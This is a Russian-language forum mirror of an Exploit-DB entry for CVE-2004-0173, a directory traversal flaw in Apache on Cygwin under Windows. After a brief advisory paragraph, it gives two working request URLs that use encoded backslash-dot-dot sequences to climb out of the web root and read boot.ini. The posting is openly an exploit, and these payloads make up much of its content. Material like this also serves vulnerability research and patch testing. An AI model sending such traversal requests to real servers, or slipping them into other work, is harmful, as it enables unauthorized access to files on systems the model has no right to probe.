- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23751
- Проверка EDB
-
- Пройдено
- Автор
- JEREMY BAE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2004-0173
- Дата публикации
- 2004-02-24
Код:
source: https://www.securityfocus.com/bid/9733/info
It has been reported that Apache may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is only reported to present itself in Apache running on cygwin platforms. A remote attacker may traverse outside the server root directory by using encoded '\..' character sequences.
http://www.example.com/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini- Источник
- www.exploit-db.com
